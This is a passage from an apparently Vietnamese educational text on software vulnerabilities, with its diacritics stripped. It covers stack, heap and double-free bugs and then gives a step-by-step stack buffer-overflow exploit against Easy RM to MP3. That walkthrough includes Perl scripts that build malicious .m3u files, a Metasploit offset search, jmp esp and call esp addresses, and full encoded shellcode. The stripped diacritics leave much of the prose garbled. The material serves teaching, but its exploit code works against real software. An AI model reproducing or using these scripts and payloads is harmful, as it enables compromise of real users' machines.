decima).MOV EAX,DWORD PTR SS:[EBP+8] : EBP cng 8 chnh l ptr to argv[1]. Bc ny sao chp a ch tr ti argv[1] vo EAX. Lu rng a ch c di bng 1 thanh ghi 32bit tc 4bytes.MOV DWORD PTR SS:[ESP+4],EAX: Sao chp EAX ( tc a ch argv[1] ti ESP cng 4. Nh rng sau khi SUB ESP,98, ESP c gim i, nh stack ( nh hnh trn) ch khng cn cng tr vo EBP na. ESP cng 4 l t nh gim xung 4 ( stack pht trin t cao xung thp). Lc ny, 4bytes trn nh stack cha a ch argv[1].LEA EAX,DWORD PTR SS:[EBP-88] : Lnh ny s lu a ch nh EBP tr 88 vo EAX:MOV DWORD PTR SS:[ESP],EAX: a ch ny sau c ghi vo ESP. ESP lc ny tr vo EBP tr 88, tc bt u ca ni strcpy() lu gi tr ca argv[1].Hnh 2.12: Stack sau khi thc hin lnh MOVCALL ; \strcpySau khi thc hin xong, tin hnh LEAVE ly li EBP lu, RET ly li EIP lu, chuyn v hm main.Nu nh khng c hm strcpy() trong hm ny, hm s kt thc v bung ra stack. C bn l, n s di chuyn ESP li ESP lu, sau thc hin lnh RET. RET trong trng hp ny s ly con tr ESP t stack v nhy n . Sau , n s quay li tr li chng trnh chnh, ni m hm do_something() c gi. Hng dn epilog c thc hin bi lnh LEAVE, m s hi phc framepointer v EIP. Trong v d ca chng ta, c hm strcpy()Hm ny s c d liu, t a ch tr bi [Buffer], v lu tr n (trong s trn), c tt c d liu cho ti khi gp null byte (string terminator k t kt thc). Trong khi sao chp d liu, ESP ni n tr ti. Strcpy() khng s dng PUSH a d liu vo stack, n s c 1 bytes v a vo stack, s dng index ch lnh ( nh ESP, ESP+1, ESP+2). Sau khi copy, ESP tr v u chui.Hnh 2.13: ESP tr v u chuiC ngha l, nu [buffer] ln hn 0x98bytes, strcpy() s ghi EBP c lu v c EIP. Sau , n ch c v ghi cho n khi gp c null byte trong chui ngun.Hnh 2.14: strcpy() s ghi EBP c lu v c EIPESP vn tr vo im bt u chui. Hm strcpy() kt thc nu khng c g sai, sau khi strcpy(), hm kt thc ( do_something()). V y l mi th tr nn th v. Chc nng epilog c kch hot. C bn, n s di chuyn ESP v ni EIP c lu, ri tin hnh RET. N s ly con tr (AAAA hoc 041414141 ty trng hp) v nhy n a ch .V vy, bn kim sot c EIP. Bng cch iu khin EIP, bn thay i a ch tr v ( return address) chng trnh tip tc bnh thng.ng nhin, bn c th thay i a ch tr v bng cch tn dng buffer overflow.V vy, gi s bn c th ghi buffer trong Myvar, EBP, EIP v bn c mt on code ca ring bn, vng trc v sau khi EIP c lu. Sau khi ghi , EIP s tr v on code ca bn. V bn lm cho EIP tr ti on code ca bn, v bn nm quyn iu khin2.3.LI TRN B M TRN HEAPHeap c s dng cho vic cp pht b nh ng. Trong ngn ng lp trnh C[7]th vic cp pht v gii phng c thc hin qua hai hm malloc() v free(). Khi chng trnh c np trong b nh th phn on heap s nm trc phn on stack[8].Bi v Heap c s dng lu tr d liu, khng c s dng lu cc gi tr a ch tr v ca hm nh l Stack nn vic khai thc li trn b m trn Heap kh khn hn nhiu so vi vic khai thc li trn b m trn StackTuy nhin vn c th khai thc thnh cng li trn b m trn heap bng hai cch sau:Sa d liu: K tn cng c th khai thc l hng bng cch ghi d liu quan trng. iu ny c th l sp chng trnh hoc lm thay i gi tr c th c khai thc sau ny (nh ghi ln mt ID ngi dng gn thm quyn truy cp).Sa i tng: Trong nhiu ngn ng lp trnh nh C++ v Objective-C, cc i tng c t trn Heap bao gm cc bng con tr hm v d liu. Do k tn cng c kh nng thay th d liu khc hay thm ch thay th c cc instance methods[9]trong lp i tng2.4.LIDOUBLE FREELi ny xy ra khi hm free()[10]c gi nhiu hn 1 ln vi cng mt a ch b nh (a ch b nh ny c chuyn vo hm free() nh mt i s). iu ny c th dn ti li trn b m do cu trc qun l d liu b nh s b hng. V v th chng trnh c th b sp , hoc trong mt s trng hp, hai hm malloc()[11]sau c s dng sau s tr v cng mt gi tr. iu ny dn ti vic k tn cng s kim sot d liu c ghi trong gp i phn b nh c cp phtKt lun chng IIChng II trnh by khi nim li phn mm v li bo mt phn mm.Trong chng ny chng ta i tm hiu mt s li bo mt phn mm ph bin l: Li trn b m trn stack, Li trn b m trn heap, Li double free.Chng ta tp chung ch yu vo vic phn tch li trn b m trn stack, y l li ph bin nht v cng d khai thc nht hin nay. iu quan trng nht trong li ny l vic ghi c ln EIP t c th iu khin c lung d liu, l vic tr ti on m ca chng ta cn thcthi.Sangchng tip theo chng ta s i nghin cu cch tm ra li v cc bc khai thc li ny.CHNG III. CC K THUT TM LI V CC BC KHAI THC LI BO MT PHN MM1.1.2.1.3.1.TM V PHT HIN LI3.1.1.Vai tr l lp trnh vinVi lp trnh vin vic tm li ph thuc ln vo kinh nghim lp trnh ca h. H tm li ch yu bng vic kim tra m ngun ca phn mm. Vi mt lp trnh vin c kinh nghim h tp trung vo cc hm m c nguy c pht sinh li cao. Mt s hm m chng ta bit l: strcat, strcpy, strncat, strncpy, sprintf, vsprintf, gets Hoc mt s cu trc c th gy liChng ta cng xem xt 3 hm: strcpy, strncpy, v strlcpyHnh 3.1: strcpy, strncpy, v strlcpyHmstrcpyghi chui vo b nh v n ghi ln bt k d liu g ng sau n. Nu chui m n ghi vo ln hn b nh m n khai bo th phn d liu tha s c ghi ln phn b nh ngay sau . iu ny gy ln li trn b m.Vi hmstrncpys ch ghi d liu va ng vi b nh c cp, song n khng c k t kt thc chui. iu ny dn ti vic khi chui ny c c th cc bytes d liu ng sau cng c th b c ra.Vi hmstrlcpyth hon ton an ton bi n t ng thm vo k t kt thc ng sau.Bng sau y s lit k cc hm tng t nh trn:HM KHNG NN DNGHM NN DNG
StrcatStrlcat
StrcpyStrlcpy
StrncatStrlcat
StrncpyStrlcpy
SprintfSnprintf hoc asprintf
Vsprintfvsnprintf hoc vasprintf
Getsfgets
Khi s dng mt s cu trc sau cng gy ln li trn b mKHNG NN DNGNN DNG
char buf[1024];if (size $file);print $FILE $junk;close($FILE);print m3u File Created successfully\n;Chy on script ny s to file m3u, c lp y bi 10000 k t A (\x41 m m hexa ca A) v m n bng phn m Easy RM to MP3. ng dng a ra mt thng bo li nh c v c x l chnh xc v ng dng khng b crash:Hnh 3.2: ng dng khng b crashBc 2: Th thay i script vi 20000 A v th li, vn nh vy ( ngoi l c x l chnh xc v chng ta vn cha th ghi c nhng thng tin c ch chi tit pha sau). By gi th thay i vi 30000 A v m bng phn mm:Hnh 3.3: ng dng b crashVy l ng dng b crash nu file c 20000 n 30000 A. ng dng b litrn b m trn stackKt lun: R rng, khng phi tt c ng dng b crash u khai thc c. Trong nhiu trng hp, mt ng dng b crash s khng dn n exploit. Nhng mt s li c th. Vi exploit, chng ta s bt ng dng lm mt ci g m khng c nh lm, v d nh chy mt on code ca bn chng hn. n gin nht lm ng dng lm g khc bng cch iu khin lung ca ng dng application flow. iu c th c bng cch iu khin cc con tr hng dn Instruction Pointer hoc Program Counter, l mt thanh ghi ca CPU cha con tr ch n lnh tip theo s c thc hin.Gi s ng dng gi mt hm vi mt tham s. Trc khi n hm , n s lu li v tr hin ti ( thng c bit n l a ch quay v khi hm kt thc). Nu bn c th thay i gi tr ca con tr ny tr n n mt ch khc trong b nh m cha phn code ca bn, tip theo bn c th thay i dng x l ca ng dng v lm cho n thc thi mt ci g khc ( thay v tr v v tr ban u). on code m bn mun c thc thi sau khi iu khin c con tr thng c gi l shellcode. V vy, nu chng ta lm cho ng dng chy shellcode ca chng ta, chng ta c th goi n l mt exploit. Trong hu ht trng hp, con tr ny c tham chiu bi thanh ghi EIP. Thanh ghi c di 4 bytes. Cho nn nu bn c th thay i 4 bytes ny, bn s lm ch c ng dng v computer chy ng dng .3.2.CC BC KHAI THC LITrong phn ny chng ta s ch yu tm hiu cc bc khai thc li trn b m trn stack. Thng thng c 5 bc thc hin vic khai thc l hng bo mt phn mm ny. Sau y l chi tit tng bc3.2.1.Mc chng trnh tidebugger[13] thy c trng thi ca stack ( v gi tr ca thanh ghi, nh con tr stack, con tr lnh..) chng ta cn phi mc mt debugger ti ng dng, chng ta c th thy nhng g xy ra trong thi gian ng dng chy ( v c bit khi n cht). C nhiu trnh debug cho mc ch ny, trong l Windbg, v Immunitys Debugger.By gi chng ta s bt u vi v d phn tm li trn b m trn stack:Chy Easy RM to MP3 v m filecrash.m3umt ln na. ng dng s sp mt ln na. Lc ny ng dng debugger s chy.Hnh 3.4: Giao din ca WindbgHnh 3.5: Giao din ca ImmunityHai giao din ny cho thng tin gn ging nhau, ch khc nhau cch th hin. Vi giao din va phn mm Immunity tri trn, bn c th thy CPU view, hiu th assembly code. Ca s trng v EIP hin ti tr ti 41414141 l mt a ch sai ( AAAA). Bn phi trn, bn s thy cc thanh ghi. Phi di l ni dung ca stack.V vy, trng n nh mt phn ca file m3u c c vo buffer v gy nn buffer overflow. Chng ta gy nn trn b nh m v ghi ln trong tr lnh. V vy chng ta c th kim sot thanh ghi EIPFile ca chng ta ch cha A, chnh v vy chng ta khng bit chnh xc ln ca buffer ghi chnh xc ln EIP. Ni cch khc, nu chng ta mun ghi ln EIP ( lm cho n nhy n on m ca chng ta) chng ta phi bit chnh xc v tr trong buffer/payload s ghi a ch tr v. V tr ny thng c gi loffset3.2.2.xc nh chnh xc EIP trong b mMc ch bc ny l xc nh chnh xc v tr m EIP c lu trong stack. Chng ta tip tc phn tch v d trn lm r cch thc thc hin bc nyChng ta bit c rng EIP nm v tr no gia 20000 v 30000bytes ca buffer. By gi, bn c kh nng ghi tt c khng gian b nh gia 20000 v 30000 bytes vi a ch bn mun ghi EIP. iu ny c th lm c, nhng s tt hn nu bn tm c chnh xc v tr ghi . xc nh v tr chnh xc ca offset EIP trong buffer, chng ta cn lm thm mt s vic b sung:u tin, chng ta s thu hp khong bng cch thay i ni dung file perl. Chng ta s to ra 1 file 25000A v 5000B. Nu EIP cha 41414141, EIP s nm gia 20000 v 25000. Cn nu EIP cha 42424242, EIP gia 25000 v 30000.my $file= crash25000.m3u;my $junk = \x41 x 25000;my $junk2 = \x42 x 5000;open($FILE,>$file);print $FILE $junk.$junk2;close($FILE);print m3u File Created successfully\n;To file v m file: crash25000.m3u bng Easy RM to MP3Hnh 3.6: EIP cha 42424242 (BBBB)EIP cha 42424242 (BBBB) nn chng ta bit rng EIP nm gia 25000 v 30000.Hnh 3.7: Ni dung ca Buffer sau khi thc Easy RM to MP3 chyHnh 3.8: ni dung ESPChng ra ghi c EIP vi BBBB v c th thy c buffer trong ESPChng ra cn tm chnh xc v tr trong buffer ghi EIP. lm c vic , chng ra s dng MetasploitMetasploit l cng c tt gip tnh ton offset. N s to tra nhng string cha nhng mu duy nht. S dng mu ny, cng vi gi tr EIP sau khi s dng mu ny trong file m3u) chng ta thy c b m d ln s c c ghi EIP nh th no.M th mc tool trong metasploit framework3. Bn s tm thy mt script lpattern_create.rb. To mt mu vi 5000 k t v ghi n ra file.root@bt:/pentest/exploits/framework/tools#./pattern_create.rb5000Thay i perl script ca chng ta v thay i $junk2 bng 5000 k t ca chng ta:my $file= crash25000.m3u;my $junk = \x41 x 25000;my $junk2 = put the 5000 characters hereopen($FILE,>$file);print $FILE $junk.$junk2;close($FILE);print m3u File Created successfully\n;To file .m3u, v m bng Easy RM to MP3. i cho ng dng cht v ch n ni dung ca EIP:Hnh 3.9: Ni dung ca EIP sau khi ng dng sp Trong ln ny, EIP cha gi tr 0x356b4234Chng ta s s dng cng c th hai ca metasploit ngay by gi. tnh ton di chnh xc ca buffer trc khi ghi vo EIP, cn gia v tr EIP v di buffer:root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb0x356b4234 50001094Ta thy kt qu cu lnh ra 1094, l di buffer cn ghi EIP. Cho nn, nu bn to mt file vi 25000+1094 A, theo sau l 4 B (42424242) EIP s cha 42424242. Chng ta bit rng EIP ch n mt im d liu trong buffer, nn chng ta s thm mt s C sau khi ghi EIP.Chng ta s thay i file m3u to file m3u mi:my $file= eipcrash.m3u;my $junk= A x 26094;my $eip = BBBB;my $espdata = C x 1000;open($FILE,>$file);print $FILE $junk.$eip.$espdata;close($FILE);print m3u File Created successfully\n;To fileeipcrash.m3u, m n bng Easy RM to MP3, v ch ti ni dung ESP:Hnh 3.10: EIP mang gi tr BBBBHnh 3.11: ESP lu a ch 000ff730By gi EIP cha BBBB, chnh xc l iu m chng ta cn. By gi chng ta s iu khin EIP. Trn nh ca n, ESP tr n buffer ca chng ta (C)Expliot buffer ca chng ta s trng nh th ny:Hnh 3.12: Ni dung caExpliot buffer3.2.3.Tm khng gian b nh lu tr cc shellcodeChng ta iu khin c EIP, gi chng ta s chi ti mt ch no , ni cha code ca chng ta ( shellcode). Nhng trong khong trng ny, lm th no chng ta c th t shellcode ti v tr v lm cho EIP nhy n ? Tip tc phn tch v d trn lm sng t vn ny. lm crash (sp ) ng dng, chng ta ghi 26094 A vo b nh, chng ta chi mt gi tr mi vo EIP, ghi mt lot C.Khi ng dng b crash (sp ), ch n cc thanh ghi v dump (ch ra) chng (s dng lnh: d esp, d eax, d ebx) bn s thy buffer ca chng ta ( ch gm c A v C), gi bn c th thay th chng bng shell code v nhy ti v tr . Trong v d ca chng ta, c th thy ESP tr n C ( s dng d esp xem), do tng l t shellcode vo phn C v yu cu EIP tr n .Mc d thc t l cho d ta thy C nhng khng bit c phi l C ( ti a ch 000ff730) u tin khng. Trong thc t, C u tin c t vo trong bufferChng ta li thay i perl script vi chui k t mu sau. y s dng 144 k t (c th dng nhiu hoc t hn) thay th C.my $file= test1.m3u;my $junk= A x 26094;my $eip = BBBB;my $shellcode = 1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK .5ABCDEFGHIJK6ABCDEFGHIJK .7ABCDEFGHIJK8ABCDEFGHIJK .9ABCDEFGHIJKAABCDEFGHIJK.BABCDEFGHIJKCABCDEFGHIJK;open($FILE,>$file);print $FILE $junk.$eip.$shellcode;close($FILE);print m3u File Created successfully\n;To file v m, quan st ESP:Hnh 3.13: ESP bt u t k t th 5Bn s thy c 2 iu th v sau: ESP bt u t k t th 5 trong mu ca chng ta, ch khng phi k t u tin Kt thc chui mu bn thy A, nhng A ny thuc v phn u ca mu (26101 A) , do bn c th t shellcode vo phn u ca mu.Chng ta s thm 4 k t trc mu v kim tra li mt ln na.ESP s tr vo k t u tin ca mu:my $file= test1.m3u;my $junk= A x 26094;my $eip = BBBB;my $preshellcode = XXXX;my $shellcode = 1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK .5ABCDEFGHIJK6ABCDEFGHIJK .7ABCDEFGHIJK8ABCDEFGHIJK .9ABCDEFGHIJKAABCDEFGHIJK.BABCDEFGHIJKCABCDEFGHIJK;open($FILE,>$file);print $FILE $junk.$eip.$preshellcode.$shellcode;close($FILE);print m3u File Created successfully\n;ng dng li crash v quan st ESP ln na:Hnh 3.14: ESP tr vo k t u tin ca chui muBy gi chng ta c: Kim sot c EIP Mt vng m chng ta c th t shellcode (144bytes). Thc t n ln hn, ln hn rt nhiu. Thanh ghi tr trc tip vo code ca chng ta, ti a ch 0x000ff730Chng ta cn: Mt shellcode thc s Ni vi EIP tr n a ch bt u shellcode. C th lm vy bng cch ghi EIP vi a ch 0x000ff730By gi chng ta s lm trng hp n gin. Ghi EIP vi 000ff730, ri 25NOP[14](\x90), ri break (/xcc), ri 25NOP. Nu thnh cng, EIP s nhy n 0x000ff730, chy NOP cho n khi gp break.my $file= test1.m3u;my $junk= A x 26094;my $eip = pack(V,0x000ff730);my $shellcode = \x90 x 25;$shellcode = $shellcode.\xcc;$shellcode = $shellcode.\x90 x 25;open($FILE,>$file);print $FILE $junk.$eip.$shellcode;close($FILE);print m3u File Created successfully\n;ng dng sp . Khi nhn vo EIP, tr n 0x000ff730. Khi dump ESP, chng ta khng nhn thy ci chng ta mong i.Hnh 3.15: eip cha ni dung l 000ff730Nhy n mt a ch trc tip khng phi l mt phng php tt (000ff730 cha null byte string terminator). Bn cnh , vic s dng mt a ch nh jump (nhy) l khng ng tin cy, n ph thuc vo h iu hnh, ngn ng. Vy lm th no nhy ti shellcode mt cch tin cy? iu ny c trnh by bc tip theo.3.2.4.Nhy n shellcode mt cch tin cyChng ta t buffer chnh xc ti im ESP tr vo. Ni cch khc, ESP tr vo im bt u shellcode. Nu trng hp khng xy ra, chng ta cn tin hnh xem xt ni dung cc con tr khc, v hy vng tm thy buffer. Trong v d ny, chng ta s dng ESP.Jumming to ESP l k thut rt ph bin trong ng dng windows. Thc t ng dng windows s dng mt hoc nhiu file dll, v cc dll ny cha rt nhiu m lnh. Hn na, a ch s dng bi dll l a ch tnh. Cho nn nu tm c dll cha m lnh nhy n esp, chng ta c th ghi a ch EIP bng a ch lnh .Trc tin, chng ta cn tm nhng opcode[15]cho jmp espBn c th lm vic bng cch m Easy RM to MP3, ri m windbg, v hook (mc) windbg ti Easy RM to MP3. Khng lm bt k iu g vi Easy RM to MP3. iu ny gip windbg cho ta thy Easy RM to MP3 np nhng module , nhng dll no.Hnh 3.16: Mc windbg viEasy RM to MP3Khi gn vo debugger, ng dng s b breakTrong windbg command line, nhp a (assemble) v enterTip theo nhp jmp esp v enterTip theo nhp u (unassemble) ri n a ch hin th lc trc khi nhp jmp espHnh 3.17: ffe4 l opcode ca jmp espn 7c90120e, bn c th thy ff e4. l opcode ca jmp esp. By gi chng ta s tm opcode trong nhng dll c load.ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dllModLoad: 10000000 10071000 C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dllModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dllModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dllModLoad: 00ce0000 00d7f000 C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dllModLoad: 01a90000 01b01000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dllModLoad: 00c80000 00c87000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec01.dllModLoad: 01b10000 01fdd000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dllModLoad: 01fe0000 01ff1000 C:\WINDOWS\system32\MSVCIRT.dllModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dllNu chng ta tm c mt opcode trong dll, y l c hi tt khai thc trn windows. Nu chng ta tm trong mt dll thuc v h iu hnh, chng ta s thy rng ch c th lm vic vi phin bn h iu hnh . Do chng ta s lm vic vi Easy RM to MP3 dll trc tin:Chng ta xem xtC:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll. Dll c load gia 01b10000 v 01fd000. Tin hnh tm kim ff e4Khi la chn 1 a ch, hy ch ti NULL BYTE. Bn nn trnh s dng null byte. Byte ny s kt thc chui v phn sau d liu khng th s dng c.Mt cch khc tm kim opcode l:s 70000000 l fffffff ff e4C mt s cch tm a ch opcodeFindjmp(Ryan Permeh): complite findjmp.c v chy vi cc tham s.Metasploit opcode databaseMemdumpPvefindaddr, mt plugin ca Immunity DebuggerBi v chng ta mun t shellcode trong ESP ( sau ny EIP ch ti ), a ch jmp esp khng c c null byte. a ch u tin s c ly: 0x01ccf23aKim tra a ch cha jmp esp:Hnh 3.18: Opcode ca jmp esp trong file dllNu bn ghi EIP vi 0x01ccf23a, jmp esp s c thc thi. ESP cha shellcode, v vy chng ta s c mt cch khai thc. Th nghim vi on code NOP breakng windbg li. To mt file m3u bng on script sau:my $file= test1.m3u;my $junk= A x 26094;my $eip = pack(V,0x01ccf23a);my $shellcode = \x90 x 25;$shellcode = $shellcode.\xcc;$shellcode = $shellcode.\x90 x 25;open($FILE,>$file);print $FILE $junk.$eip.$shellcode;close($FILE);print m3u File Created successfully\n;Kt qu thu c:Hnh 3.19: Kt qu thu c khi th nghim vi on NOP breakChy ng dng mt ln na, attack windbg, bm g tip tc, v m file m3u bng ng dng.ng dng break ti 000ff745, c ngha jmp esp lm vic tt ( bt u 000ff730, nhng n cha NOP nn chy ti 000ff744). Tt c vic cn lm by gi l t vo mt shellcode thc s.C rt nhiu k thut nhy ti shellcode c gii thiu k hn phn3.3. Vic s dng k thut no l ph thuc vo tng trng hp c th3.2.5.Ly shellcode hon thin exploity l bc cui cng hon thin qu trnh khai thc. Vic cui cng l chn la shellcode ph hp.Metasploit cung cp nhiu payload[16]cho chng ta xy dng exploit. Payloads c cc ty chn khc nhau, ty thuc vo nhng g chng ta cn, c th rt nh hoc rt ln. Nu b nh buffer c gii hn, bn c th s dng multi-staged shellcode. Hoc s dng shellcode th cng (32bytecmd.exeshellcode for xp sp2 en). Ngoi ra, bn c th chia nh shellcode lm cc phn gi l eggs, sau s dng k thut egg-hunting reassemble lp rp shellcode.Perl script s l:my $file=exploitrmtomp3.m3u;my $junk=Ax 26094;my $eip = pack(V,0x01ccf23a);my $shellcode =\x90x 25;# windows/exec 144 bytes#http://www.metasploit.com# Encoder: x86/shikata_ga_nai# EXITFUNC=seh, CMD=calc$shellcode = $shellcode .\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1.\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30.\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa.\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96.\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b.\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a.\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83.\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98.\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61.\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05.\x7f\xe8\x7b\xca;open($FILE,>$file);print $FILE $junk.$eip.$shellcode;close($FILE);printm3u File Created successfully\n;u tin, tt autopopup trong registry. To file m3u v m bng ng dng:Chng ta c exploit u tin.Hnh 3.20: Khai thc thnh cng3.3.CC K THUT NHY TI SHELLCODEVic nhy ti shellcode l vic quan trng nht trong qu trnh khai thc li phn mm. N l yu t quyt nh n s thnh cng ca vic khai thc li bo mt phn mm. C rt nhiu cch nhy ti shellcode, ty tng trng hp c th m la chn cch thc hin hp l. Trong phn ny chng ta s i tm hiu tng cch thc nhy ti shellcode mt3.3.1.jump (hoc call)Jump ( hoc call) thanh ghi tr trc tip n shellcode. Vi k thut ny, c bn l bn s s dng mt thanh ghi c cha a ch tr ti ni cha shellcode v t a ch ny vo trong EIP. Bn s c gng tm opcode ca jump hoc call ti thanh ghi c trong cc dll file ca ng dng ang chy. Khi bn to ra payload, thay v ghi EIP ti mt a ch trong b nh, bn s ghi a ch cha lnh jum to register. ng nhin, phng php ny ch hot ng tt khi m thanh ghi cha a ch tr ti shellcode. y l cch m chng ta s dng trong phn trn.Nu mt thanh ghi cha mt a ch tr trc tip ti shellcode, bn c th s dng call [reg] hoc jump trc tip n shellcode. Ni cch khc, nu ESP tr trc tip vo shellcode ( nn bytes u tin ca shellcode l bytes u tin ca ESP) bn c th ghi EIP vi a ch cha lnh call esp, v shellcode s c thc thi. iu ny lm vic vi tt c thanh ghi v th vin kernel32.dll cha rt nhiu a ch cha call [reg].V d : gi s ESP tr trc tip n shellcode, u tin hy tm mt opcode c cha call esp. Chng ta s s dng findjmp:findjmp.exekernel32.dll espFindjmp, Eeye, I2S-LaBFindjmp2, Hat-SquadScanning kernel32.dll for code useable with the esp register0x7C836A08 call esp0x7C874413 jmp espFinished Scanning kernel32.dll for code useable with the esp registerFound 2 usable addressesTip theo, chng ta s ghi EIP vi a ch 0x7C836A08.Trong v d trc, vi Easy RM to MP3, chng ta bit rng c th tr ESP ti shellcode bng cch thm 4 k t gia EIP v ESP, exploit s nh sau:my $file= test1.m3u;my $junk= A x 26094;my $eip = pack(V,0x7C836A08);my $prependesp = XXXX;my $shellcode = \x90 x 25;# windows/exec 303 bytes#http://www.metasploit.com# Encoder: x86/alpha_upper# EXITFUNC=seh, CMD=calc$shellcode = $shellcode . \x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49 .\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56 .\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42 .\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a .\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47 .\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c .\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a .\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50 .\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43 .\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a .\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c .\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44 .\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c .\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47 .\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50 .\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44 .\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43 .\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42 .\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b .\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45 .\x31\x42\x4c\x42\x43\x45\x50\x41\x41;open($FILE,>$file);print $FILE $junk.$eip.$prependesp.$shellcode;close($FILE);print m3u File Created successfully\n;3.3.2.pop returnnu khng c mt thanh ghi no tr trc tip ti a ch, nhng bn c th thy mt a ch trong stack ( c th nm u tin, th hai) tr ti shellcode, bn c th ti vo trong EIP, nu u tin l pop ret[17], hoc pop pop ret nu th hai, hoc pop pop pop pop ret ph thuc vo v tr nm trong stack.Trong v d Easy RM to MP3, chng ta hon ton c th tinh chnh ESP tr trc tip ti shellcode. Vy s nh th no nu khng c thanh ghi no tr ti shellcode.Vng, trong trng hp ny, a ch tr ti shellcode c th nm trn stack. Nu bn dump esp, nhn vo cc a ch u tin. Nu mt trong cc a ch ny tr ti shellcode ( hoc buffer bn iu khin c), tip theo bn c th tm c pop ret hoc pop pop ret : Ly a ch trong stack Nhy n a ch m n a bn ti shellcodeK thut pop ret ch c tc dng khi ESP+offset cha a ch tr ti shellcode. V vy, khi dump ESP, nu mt trong cc a ch u tin tr ti shellcode, v t mt tham chiu ti pop ret ( hoc pop pop ret) trong EIP. iu ny lm mt mt s a ch trong stack ( mt a ch cho mt ln pop) v a a ch tip theo vo EIP. Nu mt trong s tr ti shellcode, bn s thnh cng.Trng hp th hai s dng pop ret: Khi bn kim sot c EIP, khng c thanh ghi no tr ti shellcode, nhng shellcode ca bn c thy ESP+8. Trong trng hp ny, bn c th t pop pop ret vo EIP, s nhy ti ESP+8.Hy xy dng mt th nghim. Chng ta c 26094 bytes trc khi ghi EIP, v cn 4bytes trc khi ti v tr ESP tr ti (trong trng hp ca ti, y l 0x000ff730).Chng ta s m phng ti ESP+8, c mt a ch tr ti shellcode ( thc t l s t shellcode ngay sau , y ch l th nghim). 26094 A, tip theo l XXXX ( kt thc l ni ESP tr ti), break, tip n l 7 NOP, break, v nhiu NOP na. Gi s shellcode bt u t break th hai. Mc ch l nhy t break u tin ti ti break th hai, ESP+8 0x000ff738.my $file= test1.m3u;my $junk= A x 26094;my $eip = BBBB;my $prependesp = XXXX;my $shellcode = \xcc;$shellcode = $shellcode . \x90 x 7$shellcode = $shellcode . \xcc;$shellcode = $shellcode . \x90 x 500;open($FILE,>$file);print $FILE $junk.$eip.$prependesp.$shellcode;close($FILE);print m3u File Created successfully\n;Nhn vo stack, ng dng b crash bi buffer overflow. EIP b ghi bi BBBB. ESP tr ti 000ff730, bt u vi break u tin, tip n l 7 NOP, chng ta s thy break th hai, ni thc s bt u ca shellcode ( ti a ch 0x000ff738).Mc ch l ly gi tr trong ESP+8 vo EIP, v lm cho nhy n shellcode. Chng ta s s dng k thut pop ret v a ch ca jmp esp hon thnh.Mt lnh pop s ly 4bytes trong stack, khi ESP tr ti 000ff734. Chy mt lnh pop na, s ly tip 4bytes na, ESP tr ti 000ff738. Khi lnh ret c thc thi, gi tr hin ti ca ESP s c a vo EIP. Cho nn gi tr ti 000ff738 cha a ch ca lnh jmp esp, th l nhng g EIP s lm. Buffer sau 000ff738 cha shellcode ca chng ta.Chng ta cn tm pop,pop,ret trong mt ni no , v ghi EIP bng a ch lnh u tin trong chui lnh . V chng ta phi thip lp ESP+8 tr n a ch ca jmp esp, theo sau l shellcode ca chng ta.Trc tin chng ta phi bit opcode ca pop pop ret. Chng ta s s dng chc nng assembly trong windbg thc 